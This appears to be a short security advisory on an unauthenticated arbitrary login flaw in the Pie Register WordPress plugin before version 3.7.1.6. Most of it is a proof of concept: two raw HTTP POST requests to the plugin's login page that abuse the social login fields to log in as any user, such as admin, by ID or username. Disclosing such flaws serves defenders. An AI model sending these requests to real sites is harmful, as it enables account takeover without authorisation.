Pie Register < 3.7.1.6 - Unauthenticated Arbitrary Login

The plugin has a flaw in the social login implementation, allowing unauthenticated attacker to login as any user on the site by only knowing their user ID or username

PoC

/pie-register-login/ is the login page of the plugin, ie the one with [pie_register_login] v < 3.7.1.5 POST /pie-register-login/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 115 Connection: close Upgrade-Insecure-Requests: 1 log=a&pwd;=a&social;_site=true&user;_id_social_site=1&wp-submit;=Log+In&testcookie;=1 v < 3.7.1.6 POST /pie-register-login/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 49 Connection: close Upgrade-Insecure-Requests: 1 log=admin&pwd;=a&social;_site=true&wp-submit;=Log+In